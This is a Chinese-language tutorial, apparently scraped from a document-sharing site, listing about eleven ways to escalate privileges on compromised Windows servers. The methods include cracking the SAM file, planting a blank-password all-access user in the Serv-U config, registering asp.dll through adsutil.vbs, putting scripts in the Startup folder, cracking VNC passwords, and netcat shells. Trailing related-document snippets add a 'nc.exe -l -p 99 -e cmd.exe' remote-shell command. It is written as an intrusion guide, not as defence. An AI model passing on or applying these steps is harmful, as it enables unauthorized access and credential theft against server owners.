用户提权的方法

1.radmin连接法

  条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去。本人从来没成功过。,端口到是给对方打开了。

  2.pcanywhere

  C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 这里下他的GI


F文件,在本地安装pcanywhere上去

  3.SAM破解

  C:\WINNT\system32\config\ 下他的SAM 破解之

  4.SU密码夺取

  C:\Documents and Settings\All Users\「开始」菜单\程序\

  引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转

  进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空

  [USER=WekweN 1] Password= HomeDir=c:\ TimeOut=600 Maintenance=System Access1=C:\ RWAMELCDP Access1=d:\ RWAMELCDP Access1=f:\ RWAMELCDP SKEYValues=

  这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限

  5.c:\winnt\system32\inetsrv\data\

  引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行

  6.SU溢出提权

  这个网上教程N多 不详细讲解了

  7.运行Csript

  引用:运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限

  用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps

  查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll

  再将asp.dll加入特权一族

  asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)

  我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"

  可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了

  8.脚本提权

  c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs

  9.VNC

  这个是小花的文章 HOHO

  默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password

  我们可以用vncx4

  破解它,vncx4使用很简单,只要在命令行下输入

  c:\>vncx4 -W

  然后顺序输入上面的每一个十六进制数据,没输完

一个回车一次就行了。

  10.NC提权

  给对方来个NC 但是条件是你要有足够的运行权限 然后把它反弹到自己的电脑上 HOHO OK了

11.社会工程学之GUEST提权

  很简单 查看他的拥护 一般来说 看到帐户以后 密码尽量猜 可能用户密码一样 也

相关文档
21种提权方法
具体命令: 建立用户: serv-u.exe "cmd" >USER xl >PASS 111111 反弹shell: serv-u.exe "nc.exe -l -p 99 -e cmd.exe" 很不错的提权方法今天我...
oracle 10g 漏洞--低权限用户提权方法
oracle 10g 漏洞--低权限用户提权方法_计算机软件及应用_IT/计算机_专业资料。oracle 低权限用户提权方法:【漏洞名称】 sys.dbms_export_extension.get_domain_...
域内用户的提权
还是一篇关于活动目录下,用用户对程序提权的问题。以前写过了一篇这样的文章了,... 这是一个多么可怕而可笑在的问题,呃,我有两个方案,一边打字,一边想的哇, ...
MYSQL用户root密码为弱口令又一提权方法
MYSQL用户root密码为弱口令又一提权方法_IT/计算机_专业资料。MYSQL用户root密码为弱口令又一提权方法作者:admin 日期:2009-02-19 字体大小: 小中大 一般就是...
网上收集的提权方法
网上收集的提权方法_IT/计算机_专业资料。提权方法汇总。简单获取dsn信息的...odbcad32来配置发现创建dsn有三种方式: 1 用户dsn 信息保存在 HKEY_LOCAL_...
21种提权方法
21种提权方法_IT/计算机_专业资料。1.radmin 连接法 条件是你权限够大,对方...\
服务器 提权方法大全
不过针对本地提权是可以防范的,下面是我在 xiaolu 的文章中节选的: 防止办法和对策: 一般防止方法: 设置目录权限, 通过去掉 Web 目录 iusr 用户的执行权限来...
最全的提权
最全的提权 思路: 上传 serv-u 本地溢出文件 srv.exe 和 nc.exe 利用 nc...方法 5 :在 WinNT 4 和 Windows 2000 注册表里指定用户 Shell 程序 (...
Windows与Linux本地用户提权体验
Windows与Linux本地用户提权体验【IT专家网独家】无论是Windows系统还是Linux系统...环境说明: OS:Fedora Core 6 (域名:ns.linux.com.cn) Tools:PuTTY(SSH/...
提权方法
=== VNC提权方法 === 利用shell读取vnc保存在注册表中的密文,使用工具VNC4X...没有删cmd组建的直接加用户。 7i24的web目录也是可写,权限为administrator。 No...
相关主题
热门文档